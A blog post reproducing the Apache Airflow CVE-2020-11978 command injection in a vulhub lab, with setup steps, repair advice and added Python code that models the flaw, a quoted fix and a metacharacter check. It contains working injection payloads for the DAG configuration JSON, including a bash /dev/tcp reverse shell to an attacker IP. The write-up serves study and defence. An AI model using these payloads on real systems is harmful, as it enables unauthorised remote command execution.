
(CVE-2020-11978) Command injection vulnerability reproduction in an Airflow DAG [vulhub range]

2022-06-24 07:29:00 Refused guanxiaotong for many times


Preface

Since I moved to Java tool development I have had very little contact with vulnerabilities. Back when I was still doing security work I would reproduce one article a day; after changing direction I stopped touching vulnerabilities. Just yesterday a handsome guy came to me with a question, asking whether I knew the Apache Airflow (CVE-2020-11978) vulnerability. Hence this blog post: a reproduction of CVE-2020-11978.


Tip: the following is the main body of this article; the cases below can be used for reference.

1. Supplementary vulnerability information

Airflow is a data pipeline platform written in Python for scheduling and monitoring workflows. Airflow manages task flows through DAGs (directed acyclic graphs): you do not need to know the specific content of the business data, and task scheduling is achieved by setting dependencies between tasks.
The platform integrates with Hive, Presto, MySQL, HDFS, Postgres and others, and provides hooks so that it is easily extensible. Besides a command-line interface, the tool also provides a web-based user interface for visualizing pipeline dependencies, monitoring progress, triggering tasks and so on.

2. Vulnerability profile

Apache Airflow is an open-source distributed task-scheduling framework. In version 1.10.10 and earlier, one of the example DAGs shipped with it contains a command injection vulnerability; an unauthenticated visitor can use it to execute arbitrary commands on the Worker.

3. Affected versions

Apache Airflow <= 1.10.10

4. Vulnerability reproduction

(1) Start the vulhub range environment

If you do not have vulhub, download it and extract the package following the usual steps. If your copy of vulhub does not contain this vulnerability, download a fresh vulhub; the second airflow entry shown in the figure below is the one.
Enter the CVE-2020-11978 folder.
Enter the following commands to start it:

docker-compose run airflow-init
docker-compose up -d

Then access the vulnerable address: http://127.0.0.1:8080.

Because it is inconvenient to operate inside the virtual machine, I ran ifconfig in the VM and got the IP address 192.168.25.130; replacing 127.0.0.1 with this IP lets me access it from my local browser, as shown below:

Note! Because the vulnerability environment is relatively large, startup is very slow and it is not accessible right away; I don't know how long it takes. I started the environment the night before and found port 8080 inaccessible; after a nap it could be accessed. So don't worry, wait patiently after starting the environment; you can do something else first.

(2) Command execution

Visit http://192.168.25.130:8080 to enter the Airflow management UI, and switch example_trigger_target_dag from Off to On.
Enter the example_trigger_target_dag page and click Trigger DAG, which opens the trigger page.
In Configuration JSON, enter:

{
    "message": "'\";touch /tmp/what_the_fuck;#"
}

Click Trigger again to run the DAG.
Wait a few seconds and you can see that it executed successfully.
It shows success, meaning the run succeeded.

Enter the container and check the directory: the file /tmp/what_the_fuck was created, so the vulnerability is reproduced.

docker-compose exec airflow-worker bash


(3) NC reverse shell

Since touch can create a file, bouncing a shell back is not a big problem; let's look at the steps.

On the attacking machine 192.168.230.234, start nc listening on port 9999.
In Configuration JSON, enter:

{
    "message": "'\";bash -i >& /dev/tcp/192.168.230.234/9999 0>&1;#"
}

Click Trigger again to run the DAG.
The shell is bounced back successfully and commands can be executed.

5. Repair suggestions

1. Upgrade to a version later than 1.10.10.
2. Delete or disable the default example DAGs (set load_examples=False in the configuration file).
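The root cause behind the reproduction above is a DAG that renders the user-supplied dag_run.conf value straight into a BashOperator command string, so a quote in the value ends the shell string and everything after it becomes new commands. The following is an added example, not the page's or Airflow's own code: it models that pattern (the template text is an assumption), shows a shell-quoted hardened form, tokenises each rendering the way a POSIX shell would to count the commands bash would run, and adds a small detection helper for conf values carrying shell metacharacters.

```python
import re
import shlex

# Assumed vulnerable template: the dag_run.conf value is pasted unescaped into
# a double-quoted shell string (the pattern the page describes; not Airflow's file).
UNSAFE_TEMPLATE = 'echo "Here is the message: {message}"'

# Constructed input with the quote-breakout shape from the page (neutral file name).
EXAMPLE_MESSAGE = "'\";touch /tmp/marker;#"


def render_unsafe(message: str) -> str:
    """Unescaped substitution: a quote in `message` closes the shell string."""
    return UNSAFE_TEMPLATE.format(message=message)


def render_safe(message: str) -> str:
    """Hardened form: shlex.quote wraps the whole value so bash sees one argument."""
    return "echo " + shlex.quote("Here is the message: " + message)


def shell_commands(cmd: str) -> list:
    """Tokenise `cmd` like a POSIX shell and group tokens into the simple
    commands it would run; ';', '|', '&', '&&', '||' act as separators."""
    lex = shlex.shlex(cmd, posix=True, punctuation_chars=True)
    lex.whitespace_split = True
    lex.commenters = "#"  # '#' at the start of a word begins a comment, as in bash
    commands, current = [], []
    for tok in lex:
        if tok in (";", "|", "&", "&&", "||"):
            if current:
                commands.append(current)
            current = []
        else:
            current.append(tok)
    if current:
        commands.append(current)
    return commands


# Detection aid: conf values that carry shell metacharacters deserve a look
# before any operator renders them into a command line.
SHELL_META = re.compile(r"[;&|`$<>'\"\\\n]")


def suspicious_conf(conf: dict) -> list:
    """Return the keys whose string values contain shell metacharacters."""
    return [k for k, v in conf.items() if isinstance(v, str) and SHELL_META.search(v)]


if __name__ == "__main__":
    print(shell_commands(render_unsafe(EXAMPLE_MESSAGE)))  # echo ..., then touch ...
    print(shell_commands(render_safe(EXAMPLE_MESSAGE)))    # a single echo command
    print(suspicious_conf({"message": EXAMPLE_MESSAGE}))   # ['message']
```

In a real BashOperator the same hardening is to pass the value through the operator's env parameter and reference it as "$MESSAGE" inside the command, so bash never parses the conf content as syntax.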


Summary

Reproducing the vulnerability is simple, but the principle is still a bit confusing; I recommend understanding the principle while you reproduce the vulnerability.


Copyright notice
This article was written by [Refused guanxiaotong for many times]; please include the original link when reprinting.
https://yzsam.com/2022/175/202206240147074179.html